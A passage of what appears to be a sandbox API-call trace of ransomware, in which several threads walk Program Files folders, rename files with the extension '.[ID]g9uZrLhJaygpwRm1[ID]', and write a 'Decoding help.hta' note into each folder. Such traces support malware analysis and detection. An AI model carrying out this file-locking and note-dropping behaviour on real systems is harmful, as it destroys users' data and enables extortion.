Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="cronometer_s.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png" [0060.391] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png" [0060.391] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png.[ID]g9uZrLhJaygpwRm1[ID]" [0060.391] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_s.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_s.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.391] FindNextFileW (in: hFindFile=0x5a5870, lpFindFileData=0x2c1afd30 | out: lpFindFileData=0x2c1afd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8c9384c, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8c9384c, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4e52fdc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x7454, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_settings.png", cAlternateFileName="")) returned 1 [0060.391] lstrcpyW (in: lpString1=0x115c1600, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0060.391] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 74 [0060.391] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" [0060.391] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\decoding help.hta")) returned 0x1 [0060.392] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cronometer_settings.png") returned 1 [0060.392] lstrlenW (lpString="cronometer_settings.png") returned 23 [0060.392] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0060.392] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 74 [0060.392] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="cronometer_settings.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png" [0060.392] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png" [0060.392] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png.[ID]g9uZrLhJaygpwRm1[ID]" [0060.392] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_settings.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_settings.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.312] FindNextFileW (in: hFindFile=0x5a5870, lpFindFileData=0x2c1afd30 | out: lpFindFileData=0x2c1afd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8cb99ab, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8cb99ab, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4e52fdc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x77b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner.png", cAlternateFileName="")) returned 1 [0061.312] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0061.312] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 74 [0061.312] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" [0061.312] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\decoding help.hta")) returned 0x1 [0061.312] lstrcmpiW (lpString1="Decoding help.hta", lpString2="diner.png") returned -1 [0061.312] lstrlenW (lpString="diner.png") returned 9 [0061.312] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0061.312] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 74 [0061.312] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="diner.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png" [0061.312] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png" [0061.312] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.312] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.312] FindNextFileW (in: hFindFile=0x5a5870, lpFindFileData=0x2c1afd30 | out: lpFindFileData=0x2c1afd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8cdfb0a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8cdfb0a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4e7913c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb80, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner_dot.png", cAlternateFileName="")) returned 1 [0061.313] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0061.313] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 74 [0061.313] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" [0061.313] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\decoding help.hta")) returned 0x1 [0061.313] lstrcmpiW (lpString1="Decoding help.hta", lpString2="diner_dot.png") returned -1 [0061.313] lstrlenW (lpString="diner_dot.png") returned 13 [0061.313] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0061.313] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 74 [0061.313] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="diner_dot.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_dot.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_dot.png" [0061.313] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_dot.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_dot.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_dot.png" [0061.313] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_dot.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_dot.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_dot.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.313] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_dot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_dot.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_dot.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_dot.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.986] FindNextFileW (in: hFindFile=0x5a5870, lpFindFileData=0x2c1afd30 | out: lpFindFileData=0x2c1afd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8cb99ab, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8cb99ab, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4e7913c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x170, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner_h.png", cAlternateFileName="")) returned 1 Thread: id = 890 os_tid = 0x8f0 [0055.162] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\*.*", lpFindFileData=0x2c2efd30 | out: lpFindFileData=0x2c2efd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f43efc8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7fa6b2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f465237, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fba3d8 [0062.531] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.532] FindNextFileW (in: hFindFile=0x10fba3d8, lpFindFileData=0x2c2efd30 | out: lpFindFileData=0x2c2efd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f43efc8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7fa6b2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f465237, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.532] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.532] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.532] FindNextFileW (in: hFindFile=0x10fba3d8, lpFindFileData=0x2c2efd30 | out: lpFindFileData=0x2c2efd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fe188e9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fe188e9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d019747, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 Thread: id = 891 os_tid = 0xb90 [0055.182] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\*.*", lpFindFileData=0x2c42fd30 | out: lpFindFileData=0x2c42fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1a3fc59, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa63097e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1a65ec8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fba418 [0062.531] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.531] FindNextFileW (in: hFindFile=0x10fba418, lpFindFileData=0x2c42fd30 | out: lpFindFileData=0x2c42fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1a3fc59, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa63097e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1a65ec8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.531] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.531] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.531] FindNextFileW (in: hFindFile=0x10fba418, lpFindFileData=0x2c42fd30 | out: lpFindFileData=0x2c42fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f12724e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f12724e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d03f8a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 Thread: id = 892 os_tid = 0xa64 [0055.186] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\*.*", lpFindFileData=0x2c56fd30 | out: lpFindFileData=0x2c56fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa0fd11ff, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa787f65, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa108fe2a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10f14140 [0062.529] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.529] FindNextFileW (in: hFindFile=0x10f14140, lpFindFileData=0x2c56fd30 | out: lpFindFileData=0x2c56fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa0fd11ff, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa787f65, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa108fe2a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.529] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.530] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.530] FindNextFileW (in: hFindFile=0x10f14140, lpFindFileData=0x2c56fd30 | out: lpFindFileData=0x2c56fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6faf8c48, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6faf8c48, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1240d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 Thread: id = 893 os_tid = 0x6d0 [0055.190] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\*.*", lpFindFileData=0x2c6afd30 | out: lpFindFileData=0x2c6afd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa19a729d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7fa6b2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1a3fc59, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fb9f58 [0062.532] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.533] FindNextFileW (in: hFindFile=0x10fb9f58, lpFindFileData=0x2c6afd30 | out: lpFindFileData=0x2c6afd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa19a729d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7fa6b2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1a3fc59, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.533] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.533] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.533] FindNextFileW (in: hFindFile=0x10fb9f58, lpFindFileData=0x2c6afd30 | out: lpFindFileData=0x2c6afd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70bee7b2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70bee7b2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d170395, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 Thread: id = 894 os_tid = 0xb94 [0055.191] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*.*", lpFindFileData=0x2c7efd30 | out: lpFindFileData=0x2c7efd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbc758 [0059.395] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.395] FindNextFileW (in: hFindFile=0x10fbc758, lpFindFileData=0x2c7efd30 | out: lpFindFileData=0x2c7efd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.395] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.395] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.395] FindNextFileW (in: hFindFile=0x10fbc758, lpFindFileData=0x2c7efd30 | out: lpFindFileData=0x2c7efd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9e26c68, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea015e21, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea015e21, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0059.395] lstrcpyW (in: lpString1=0x24550388, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*.*" [0059.395] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*.*") returned 64 [0059.395] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\Decoding help.hta" [0059.395] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\decoding help.hta")) returned 0xffffffff [0059.395] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4bc [0060.646] WriteFile (in: hFile=0x4bc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2c7efcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2c7efcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.647] CloseHandle (hObject=0x4bc) returned 1 [0060.647] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 